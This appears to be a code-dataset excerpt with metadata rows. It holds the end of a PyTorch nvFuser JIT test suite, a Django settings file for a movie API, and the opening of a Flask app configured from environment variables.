self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_tensor_permuted(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
y = torch.tensor(1.0, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cpu_scalar(self):
x = torch.randn(4, 2, 3, device="cuda")
y = torch.tensor(1.0, device="cpu")
z = torch.tensor(2.0, device="cpu")
with nvfuser_singleton_fusion(True):
# testing cpu scalar tensor promotion
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
# scalar cpu tensor add should NOT be fused
@torch.jit.script
def t1(y, z):
return y * z
for _ in range(5):
t1(y, z)
self.assertGraphContainsExactly(t1.graph_for(y, z), FUSION_GUARD, 0)
# everything, including scalar cpu tensor add should be fused
@torch.jit.script
def t2(x, y, z):
tmp = y + z
return tmp + x
for _ in range(5):
t2(x, y, z)
self.assertGraphContainsExactly(t2.graph_for(x, y, z), 'aten::add', 0)
self.assertGraphContainsExactly(t2.graph_for(x, y, z), FUSION_GUARD, 1)
# 'cpu_tmp = y + z' shouldn't be fused.
@torch.jit.script
def t3(x, y, z):
cpu_tmp = y + z
out = x + y
return cpu_tmp, out
for _ in range(5):
t3(x, y, z)
self.assertGraphContainsExactly(t3.graph_for(x, y, z), FUSION_GUARD, 1)
self.assertGraphContainsExactly(t3.graph_for(x, y, z), 'aten::add', 1)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_shape_expression(self):
x = torch.randn(4, 2, 1, 3, device="cuda")
def t_unsqueeze(x):
t0 = x.relu()
t1 = t0.unsqueeze(1)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def t_squeeze(x):
t0 = x.relu()
t1 = t0.squeeze()
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def t_squeeze_dim(x):
t0 = x.relu()
t1 = t0.squeeze(-2)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
# squeezing a non-size 1 dimension should be a no op
def t_squeeze_dim_no_op(x):
t0 = x.relu()
t1 = t0.squeeze(1)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def run(fn):
jit_fn = torch.jit.script(fn)
jit_o = jit_fn(x)
jit_o = jit_fn(x)
jit_o = jit_fn(x)
o = fn(x)
# output 0 is a tensor, so we check dtype and value
self.assertEqual(o[0].dtype, jit_o[0].dtype)
self.assertEqual(o[0], jit_o[0])
# output 1 is shape
self.assertEqual(o[1], jit_o[1])
self.assertGraphContainsExactly(jit_fn.graph_for(x), FUSION_GUARD, 1)
for t in [t_unsqueeze, t_squeeze, t_squeeze_dim, t_squeeze_dim_no_op]:
run(t)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_cuda_tensor(self):
x = torch.tensor(2.0, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x + 1.0
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@torch.jit.script
def t_jitted(x):
return x.sum(0)
for i in range(5):
t_jitted(x)
self.assertGraphContainsExactly(t_jitted.graph_for(x), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_overlapped_input(self):
x = torch.randn(8, device="cuda").as_strided((2, 4), (1, 1))
with nvfuser_singleton_fusion(True):
def t(x):
return x + 1.0
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_reduction_empty_axes(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
with nvfuser_singleton_fusion(True):
def t(x):
sizes : List[int] = []
return x.sum(sizes)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_int_tensor_input(self):
x = torch.randn(4, 2, device="cuda").to(dtype=torch.int)
with nvfuser_singleton_fusion(True):
def t(x):
return x.amax(dim=0)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_boolean(self):
x = torch.randn(4, 2, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x.to(dtype=torch.bool)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since reshape is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view_copy_graph_guard(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
y = [4, 6]
with nvfuser_singleton_fusion(True):
def t(x, y : List[int]):
t1 = x + 1.0
t2 = t1 * 1.0
out = t2.reshape(y)
return out.relu()
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view_copy_graph_guard_double_fusion(self):
x = torch.randn(2, 2, 5, device="cuda")
w = torch.randn(5, 5, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, w):
o = x.view([4, x.size()[-1]])
o = torch.matmul(o, w)
o = o.view([2, 2, o.size()[1]])
return o
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x, w)
o = t(x, w)
self.assertEqual(jit_o, o)
# TODO: revert disabled aten::view
# self.assertGraphContainsExactly(t_jit.graph_for(x, w), FUSION_GUARD, 2, consider_subgraphs=True)
self.assertGraphContainsExactly(t_jit.graph_for(x, w), FUSION_GUARD, 0, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_input_output_passthrough(self):
def t(t0, t1, t2):
mask = t1.to(dtype=torch.bool)
masked_input = torch.where(t0, mask, t2)
return masked_input, mask
t_jit = torch.jit.script(t)
# stick to integers, this avoid the numerical difference due to our
# promotion
x = torch.randn(4, 4, device='cuda').to(dtype=torch.bool)
y = torch.randn(4, 4, device='cuda').to(dtype=torch.bool)
z = torch.tensor(1.0, device='cuda').to(dtype=torch.bool)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_pointwise_reference_tensor(self):
def t(input1, input2, scalar):
_unsafe_view = torch.ops.aten._unsafe_view(input1, [2, 4, 16])
add_ = torch.ops.aten.add_(_unsafe_view, input2)
gelu_ = torch.ops.aten.gelu(add_)
view_ = torch.ops.aten.view(gelu_, [8, 16])
mul_ = torch.ops.aten.mul(add_, scalar)
return [view_, mul_]
x = torch.randn(8, 16, device="cuda")
bias = torch.randn(16, device="cuda")
scalar = torch.ones(torch.Size([]), device="cuda")
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x, bias, scalar)
o = t(x, bias, scalar)
self.assertEqual(jit_o, o)
self.assertGraphContains(t_jit.graph_for(x, bias, scalar), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_native_batch_norm_backward(self):
grad_output = torch.randn(4, 2, 3, device="cuda")
input = torch.randn(4, 2, 3, device="cuda")
weight = torch.randn(2, device="cuda")
r_m = torch.randn(2, device="cuda")
r_v = torch.randn(2, device="cuda").abs()
save_mean = torch.randn(2, device="cuda")
save_invstd = torch.randn(2, device="cuda").abs()
with nvfuser_singleton_fusion(True):
def t(grad_out, input, weight, r_m, r_v, save_mean, save_invstd, train: bool, eps: float, mask: List[bool]):
return torch.ops.aten.native_batch_norm_backward(grad_out, input, weight, r_m, r_v, save_mean,
save_invstd, train, eps, mask)
t_jit = torch.jit.script(t)
for i in range(4):
jit_o = t_jit(grad_output, input, weight, r_m.clone(), r_v.clone(),
save_mean, save_invstd, True, 1e-5, [True, True, True])
ref_m = r_m.clone()
ref_v = r_v.clone()
jit_o = t_jit(grad_output, input, weight, r_m, r_v, save_mean, save_invstd, True, 1e-5, [True, True, True])
o = t(grad_output, input, weight, ref_m, ref_v, save_mean, save_invstd, True, 1e-5, [True, True, True])
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertEqual(ref_m.dtype, r_m.dtype)
self.assertEqual(ref_m, r_m)
self.assertEqual(ref_v.dtype, r_v.dtype)
self.assertEqual(ref_v, r_v)
self.assertGraphContains(t_jit.graph_for(grad_output, input, weight, r_m.clone(), r_v.clone, save_mean,
save_invstd, True, 1e-5, [True, True, True]), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_contiguous_on_broadcasted(self):
x = torch.randn(4, 1, device="cuda")
y = torch.randn(4, 128, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, y):
t1 = x.expand([4, 128])
t2 = t1 * y
return t2
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_skip_parser(self):
x = torch.randn(4, 12, device="cuda")
with nvfuser_singleton_fusion(True):
def fn(x):
t1 = x + 1.0
return t1.relu()
fn_jit = torch.jit.script(fn)
self._run_helper(fn_jit, fn, x)
# add node should have been merged into fusion
self.assertGraphContains(fn_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_jit.graph_for(x), 'aten::add', 0)
# flips skip parse for `aten::add`, following fusion should skip the
# add node
self.assertFalse(torch._C._jit_set_nvfuser_skip_node_kind("aten::add", True))
def fn_1(x):
t1 = x + 2.0 # change const value so we'll not reuse plan
return t1.relu()
fn_1_jit = torch.jit.script(fn_1)
self._run_helper(fn_1_jit, fn_1, x)
# add node should have been merged into fusion
self.assertGraphContains(fn_1_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_1_jit.graph_for(x), 'aten::add', 1)
# flips skip parse for `aten::add`, next fusion should fuse add node
self.assertTrue(torch._C._jit_set_nvfuser_skip_node_kind("aten::add", True))
def fn_2(x):
t1 = x + 2.0 # change const value so we'll not reuse plan
return t1.relu()
fn_2_jit = torch.jit.script(fn_2)
self._run_helper(fn_2_jit, fn_2, x)
# add node should have been merged into fusion
self.assertGraphContains(fn_2_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_2_jit.graph_for(x), 'aten::add', 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cuda_fusion_guard(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
class ConvModule(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return x.sin().sigmoid()
mod = ConvModule().to(device="cuda")
inputs = [torch.randn(20, 16, 50, 100, device="cuda", requires_grad=True)]
def reduce_scalar(temp):
return temp.sum()
scripted = torch.jit.script(mod)
with torch.no_grad():
scripted(*inputs)
res = scripted(*inputs)
reduce_scalar(res).backward()
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nvfuser_comparison_callbacks_with_fallback(self):
try:
fused_result = None
unfused_result = None
graph_ir = None
def callback(fused_outputs, unfused_outputs, graph_str):
nonlocal unfused_result
nonlocal fused_result
nonlocal graph_ir
unfused_result = unfused_outputs[-1]
fused_result = fused_outputs[-1]
graph_ir = graph_str
torch._C._jit_nvfuser_set_comparison_callback(True, callback)
def fn(x, y):
z = torch.add(x, y)
return torch.relu(z)
x = torch.rand((4, 4)).cuda() - 0.5
y = torch.rand((4, 4)).cuda() - 0.5
fn_s = torch.jit.script(fn)
fn_s(x, y)
fn_s(x, y)
fn_s(x, y)
expected = fn(x, y)
self.assertEqual(expected, fused_result)
self.assertEqual(expected, unfused_result)
FileCheck().check("aten::add").run(graph_ir)
finally:
torch._C._jit_nvfuser_clear_comparison_callback()
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nvfuser_comparison_callbacks_without_fallback(self):
try:
fused_result = None
unfused_result = None
graph_ir = None
def callback(fused_outputs, unfused_outputs, graph_str):
nonlocal unfused_result
nonlocal fused_result
nonlocal graph_ir
if len(unfused_outputs) > 0:
unfused_result = unfused_outputs[-1]
fused_result = fused_outputs[-1]
graph_ir = graph_str
torch._C._jit_nvfuser_set_comparison_callback(False, callback)
def fn(x, y):
z = torch.add(x, y)
return torch.relu(z)
x = torch.rand((4, 4)).cuda() - 0.5
y = torch.rand((4, 4)).cuda() - 0.5
fn_s = torch.jit.script(fn)
fn_s(x, y)
fn_s(x, y)
fn_s(x, y)
expected = fn(x, y)
self.assertEqual(expected, fused_result)
self.assertEqual(None, unfused_result)
FileCheck().check("aten::add").run(graph_ir)
finally:
torch._C._jit_nvfuser_clear_comparison_callback()
@unittest.skipIf(not RUN_NVFUSER, "requires NVFuser")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cuda_fusion_guard_backward(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
inp = torch.randn(10, device="cuda", requires_grad=True)
grad = torch.randn(10, device="cuda")
def f(x):
a = x.cos().cos()
return a
scripted = torch.jit.script(f)
with profile(activities=[ProfilerActivity.CPU]) as prof:
for _ in range(5):
inp.grad = None
out = scripted(inp)
out.backward(grad)
# check that we do not have fallback triggered
self.assertEqual(prof.events().table().find("fallback"), -1)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
# TODO: generalize this
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_inf_quick_patch(self):
inputs = [torch.tensor([-float('inf'), float('inf'), 4.0], device="cuda"),
torch.tensor([1.0, float('inf'), 4.0], device="cuda"),
torch.tensor([-float('inf'), -1.5, 4.0], device="cuda"),
torch.tensor([1.0, -3.0, float('nan')], device="cuda"),
torch.tensor([-float('inf'), -float('inf'), -float('inf')], device="cuda"),
torch.tensor([float('inf'), float('inf'), float('inf')], device="cuda"),
torch.tensor([float('nan'), float('nan'), float('nan')], device="cuda")]
def fn_amax(x):
return x.amax(dim=0)
def fn_amin(x):
return x.amin(dim=0)
def fn_add_nan(x):
return x.relu() + float('nan')
def fn_add(x):
return x + 1.0
with nvfuser_singleton_fusion(True):
for t in [fn_amax, fn_amin, fn_add, fn_add_nan]:
for x in inputs:
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_clamp(self):
x = torch.tensor([1., float('inf'), 2., float('nan'), float('-inf')], device="cuda")
def clamp_max(x):
return x.clamp(max=1.5)
def clamp_min_max(x):
return x.clamp(min=1.5)
def clamp_min(x):
return x.clamp(min=1., max=3.)
with nvfuser_singleton_fusion(True):
for t in [clamp_max, clamp_min, clamp_min_max]:
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
class TestPassManagerCudaFuser(JitTestCase):
def setUp(self):
super().setUp()
if RUN_NVFUSER:
self.is_enabled = torch._C._jit_set_nvfuser_enabled(False)
def tearDown(self):
if RUN_NVFUSER:
torch._C._jit_set_nvfuser_enabled(self.is_enabled)
super().tearDown()
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_context_manager_test(self):
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, dtype=torch.float, device="cuda")
with torch.jit.fuser('fuser2'):
with torch.jit.fuser('fuser2'):
def t1(x, y):
o = x + y
o = o + 2.0
return o
t_jit = torch.jit.script(t1)
t_jit(x, y)
t_jit(x, y)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
def t2(x, y):
o = x + y
o = o + 3.0
return o
t_jit_2 = torch.jit.script(t2)
t_jit_2(x, y)
t_jit_2(x, y)
self.assertGraphContains(t_jit_2.graph_for(x, y), FUSION_GUARD)
def t3(x, y):
o = x + y
o = o + 4.0
return o
t_jit_3 = torch.jit.script(t3)
t_jit_3(x, y)
t_jit_3(x, y)
self.assertGraphContainsExactly(t_jit_3.graph_for(x, y), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
def test_register_fuser(self):
self.assertFalse(torch._C._jit_set_nvfuser_enabled(True))
self.assertTrue(torch._C._jit_nvfuser_enabled())
self.assertTrue(torch._C._jit_set_nvfuser_enabled(True))
self.assertTrue(torch._C._jit_nvfuser_enabled())
self.assertTrue(torch._C._jit_set_nvfuser_enabled(False))
self.assertFalse(torch._C._jit_nvfuser_enabled())
@unittest.skipIf(RUN_CUDA, "Testing on CPU only")
def test_register_fuser_cpu(self):
with self.assertRaises(RuntimeError):
torch._C._jit_set_nvfuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
@unittest.skipIf(not RUN_CUDA, "requires CUDA")
@unittest.skipIf(not TEST_WITH_ROCM, "ROCM test only")
def test_register_fuser_rocm(self):
with self.assertRaises(RuntimeError):
torch._C._jit_set_nvfuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
# See TestNNCOpInfoParent
class TestCudaFuserOpInfoParent(JitCommonTestCase):
pass
class TestCudaFuserOpInfo(TestCudaFuserOpInfoParent):
def setUp(self):
super(TestCudaFuserOpInfoParent, self).setUp()
if RUN_NVFUSER:
self.cuda_fuser_options = CudaFuserTestOptions()
# enables guard mode since tracing could change graph to violate guard.
torch._C._jit_set_nvfuser_guard_mode(True)
self.nvfuser_single_node_mode = torch._C._jit_set_nvfuser_single_node_mode(True)
def tearDown(self):
if RUN_NVFUSER:
self.cuda_fuser_options.restore()
torch._C._jit_set_nvfuser_single_node_mode(self.nvfuser_single_node_mode)
super(TestCudaFuserOpInfoParent, self).tearDown()
@slowTest
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@ops(op_db, dtypes=OpDTypes.supported)
def test_nvfuser_correctness(self, device, dtype, op):
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
for variant, sample in variant_sample_pairs:
trace = create_traced_fn(self, variant, cache_traced_fn=True)
ref = variant(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
val = trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
self.assertEqual(ref, val, exact_layout=True)
# Note: Clearing CU after NVFuser tests
# https://github.com/pytorch/pytorch/issues/35600
# each torch.jit.trace adds state to the _python_cu compilation unit
# since this test traces a lot of functions, out-of-memory can occur
# if the CU is not cleared.
torch.jit._state._python_cu.drop_all_functions()
@slowTest
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@ops(op_db, allowed_dtypes=(torch.float16, torch.bfloat16, torch.float32,
torch.float64, torch.complex64, torch.complex128))
def test_nvfuser_extremal_values(self, device, dtype, op):
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
def _get_extremal_tensor(x, val, dtype):
if x.dtype != dtype:
return x
return torch.full_like(x, val)
def _get_extremal_input(x, val, dtype):
if isinstance(x, torch.Tensor):
return _get_extremal_tensor(x, val, dtype)
elif is_iterable_of_tensors(x):
return [_get_extremal_tensor(y, val, dtype) for y in x]
return x
def _get_extremal_sample(sample: SampleInput, val, dtype):
extremal_sample = SampleInput(
input=_get_extremal_input(sample.input, val, dtype),
args=[_get_extremal_input(x, val, dtype) for x in sample.args],
kwargs={k: _get_extremal_input(v, val, dtype) for k, v in sample.kwargs.items()},
)
return extremal_sample
def _get_extremal_samples(sample: SampleInput, dtype):
vals = [float('inf'), float('-inf'), float('nan')]
if dtype.is_complex:
complex_vals = itertools.product(vals, vals)
vals = list(map(lambda x: complex(*x), complex_vals))
for val in vals:
yield _get_extremal_sample(sample, val, dtype)
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
for variant, sample in variant_sample_pairs:
trace = create_traced_fn(self, variant, cache_traced_fn=True)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
for extremal_sample in _get_extremal_samples(sample, dtype):
try:
with freeze_rng_state():
ref = variant(*clone_inputs((extremal_sample.input, *extremal_sample.args)),
**extremal_sample.kwargs)
except (torch._C._LinAlgError, RuntimeError, ValueError):
# if eager errors out, then don't expect NVFuser to pass
continue
with freeze_rng_state():
val = trace(*clone_inputs((extremal_sample.input, *extremal_sample.args)),
**extremal_sample.kwargs)
self.assertEqual(val, ref, equal_nan=True, exact_device=True)
# See [Note: Clearing CU after NVFuser tests]
torch.jit._state._python_cu.drop_all_functions()
instantiate_device_type_tests(TestCudaFuserOpInfo, globals(), only_for=("cuda"))
if __name__ == '__main__':
run_tests()
|
[] |
[] |
[
"PYTORCH_NVFUSER_DISABLE_FALLBACK",
"PYTORCH_NVFUSER_DISABLE_FMA",
"PYTORCH_NVFUSER_JIT_OPT_LEVEL",
"PYTORCH_NVFUSER_DISABLE_RNG_UNROLL",
"PYTORCH_NVFUSER_DISABLE_FASTMATH",
"PYTORCH_NO_CUDA_MEMORY_CACHING"
] |
[]
|
["PYTORCH_NVFUSER_DISABLE_FALLBACK", "PYTORCH_NVFUSER_DISABLE_FMA", "PYTORCH_NVFUSER_JIT_OPT_LEVEL", "PYTORCH_NVFUSER_DISABLE_RNG_UNROLL", "PYTORCH_NVFUSER_DISABLE_FASTMATH", "PYTORCH_NO_CUDA_MEMORY_CACHING"]
|
python
| 6 | 0 | |
mastercode_films_api/settings.py
|
"""
Django settings for mastercode_films_api project.
Generated by 'django-admin startproject' using Django 4.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
from django.core.management.utils import get_random_secret_key
from pathlib import Path
import environ, os
# Initialise environment variables
env = environ.Env(
DEBUG=(bool, False)
)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
environ.Env.read_env(BASE_DIR / '.env')
# API INFO TMDB
URL_DB = 'https://api.themoviedb.org/3'
API_KEY = env.str('API_KEY')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str('SECRET_KEY', default=get_random_secret_key())
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool('DEBUG', default=False)
ALLOWED_HOSTS = tuple(env.list('ALLOWED_HOSTS', default=[]))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api',
'rest_framework',
'corsheaders',
# 'frontend',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mastercode_films_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'build'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mastercode_films_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
# read os.environ['DATABASE_URL'] and raises
# ImproperlyConfigured exception if not found
#
# The db() method is an alias for db_url().
'default': env.db(),
# read os.environ['SQLITE_URL']
'extra': env.db_url(
'SQLITE_URL',
default=f'sqlite:///./db.sqlite3'
# default=f'sqlite:///'+ os.path.join(BASE_DIR, 'db.sqlite3')
)
}
CACHES = {
# Read os.environ['CACHE_URL'] and raises
# ImproperlyConfigured exception if not found.
#
# The cache() method is an alias for cache_url().
'default': env.cache(),
# read os.environ['REDIS_URL']
'redis': env.cache_url('REDIS_URL')
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATIC_URL = 'static/'
STATICFILES_DIRS = [BASE_DIR / 'build/static']
STATIC_ROOT = BASE_DIR / 'static'
CORS_ORIGIN_ALLOW_ALL = True
# Default primary key field type
# https://docs.djangoproject.com/en/4.0/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[] |
[] |
[
"REDIS_URL",
"CACHE_URL",
"DATABASE_URL",
"SQLITE_URL"
] |
[]
|
["REDIS_URL", "CACHE_URL", "DATABASE_URL", "SQLITE_URL"]
|
python
| 4 | 0 | |
app.py
|
# Alexandre Nobuharu Sato em 06 de dezembro de 2021, Ribeirão Pires - SP
import os
from flask import Flask, jsonify, render_template, request, redirect, session, flash
from flask_session import Session
from werkzeug.utils import redirect
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from tempfile import mkdtemp
from helpers import brl, row2dict, apology, login_required
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
database_uri = 'postgresql+psycopg2://{dbuser}:{dbpass}@{dbhost}/{dbname}'.format(
dbuser=os.environ['DBUSER'],
dbpass=os.environ['DBPASS'],
dbhost=os.environ['DBHOST'],
dbname=os.environ['DBNAME']
)
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=database_uri,
SQLALCHEMY_TRACK_MODIFICATIONS = False,
TEMPLATES_AUTO_RELOAD = True,
SECRET_KEY = os.environ["SECRET_KEY"],
# Configure session to use filesystem (instead of signed cookies)
SESSION_FILE_DIR = mkdtemp(),
SESSION_PERMANENT = False,
SESSION_TYPE = "filesystem"
)
Session(app)
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
